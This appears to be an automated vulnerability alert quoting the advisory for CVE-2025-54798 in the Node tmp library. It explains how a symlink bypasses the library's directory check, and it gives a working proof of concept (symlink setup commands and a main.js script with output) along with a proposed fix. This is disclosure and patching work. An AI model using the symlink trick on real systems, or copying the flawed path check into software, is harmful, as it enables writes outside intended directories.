Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • asar-require-0.3.0.tgz
      • asar-0.12.1.tgz
        • tmp-0.0.28.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Summary

"tmp@0.2.3" is vulnerable to an arbitrary temporary file / directory write via a symbolic link passed as the "dir" parameter.

Details

According to the documentation there are some conditions that must hold:

    // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
    Other breaking changes, i.e.
    - template must be relative to tmpdir
    - name must be relative to tmpdir
    - dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
    are still in place.
    In order to override the system's tmpdir, you will have to use the newly introduced tmpdir option.

    // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
    * "dir": the optional temporary directory that must be relative to the system's default temporary directory. absolute paths are fine as long as they point to a location under the system's default temporary directory. Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, as tmp will not check the availability of the path, nor will it establish the requested path for you.

Related issue: raszi/node-tmp#207.

The issue occurs because "_resolvePath" does not properly handle symbolic links when resolving paths:

    // https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
    function _resolvePath(name, tmpDir) {
      if (name.startsWith(tmpDir)) {
        return path.resolve(name);
      } else {
        return path.resolve(path.join(tmpDir, name));
      }
    }

If the "dir" parameter points to a symlink that resolves to a folder outside the "tmpDir", it's possible to bypass the "_assertIsRelative" check used in "_assertAndSanitizeOptions":

    // https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
    function _assertIsRelative(name, option, tmpDir) {
      if (option === 'name') {
        // assert that name is not absolute and does not contain a path
        if (path.isAbsolute(name))
          throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
        // must not fail on valid . or .. or similar such constructs
        let basename = path.basename(name);
        if (basename === '..' || basename === '.' || basename !== name)
          throw new Error(`${option} option must not contain a path, found "${name}".`);
      } else { // if (option === 'dir' || option === 'template') {
        // assert that dir or template are relative to tmpDir
        if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
          throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
        }
        let resolvedPath = _resolvePath(name, tmpDir); //<--- symlinks are not resolved here
        if (!resolvedPath.startsWith(tmpDir))
          throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
      }
    }

PoC

The following PoC demonstrates how writing a tmp file to a folder outside the "tmpDir" is possible. Tested on a Linux machine.

  • Setup: create a symbolic link inside the "tmpDir" that points to a directory outside of it:

        mkdir $HOME/mydir1
        ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir

  • Check that the folder is empty:

        ls -lha $HOME/mydir1 | grep "tmp-"

  • Run the PoC:

        node main.js
        File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
        test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
        test 2: dir option must be relative to "/tmp", found "/foo".
        test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".

  • The temporary file is created under "$HOME/mydir1" (outside the "tmpDir"):

        ls -lha $HOME/mydir1 | grep "tmp-"
        -rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]

  • "main.js":

        // npm i tmp@0.2.3
        const tmp = require('tmp');
        const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
        console.log('File: ', tmpobj.name);
        try {
          tmp.fileSync({ 'dir': 'mydir1'});
        } catch (err) {
          console.log('test 1:', err.message)
        }
        try {
          tmp.fileSync({ 'dir': '/foo'});
        } catch (err) {
          console.log('test 2:', err.message)
        }
        try {
          const fs = require('node:fs');
          const resolved = fs.realpathSync('/tmp/evil-dir');
          tmp.fileSync({ 'dir': resolved});
        } catch (err) {
          console.log('test 3:', err.message)
        }

A potential fix could be to call "fs.realpathSync" (or similar), which also resolves symbolic links before the prefix check is made:

    function _resolvePath(name, tmpDir) {
      let resolvedPath;
      if (name.startsWith(tmpDir)) {
        resolvedPath = path.resolve(name);
      } else {
        resolvedPath = path.resolve(path.join(tmpDir, name));
      }
      return fs.realpathSync(resolvedPath);
    }

Impact

Arbitrary temporary file / directory write via symlink.

Publish Date: 2025-08-07

URL: CVE-2025-54798

CVSS 3 Score Details (2.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.
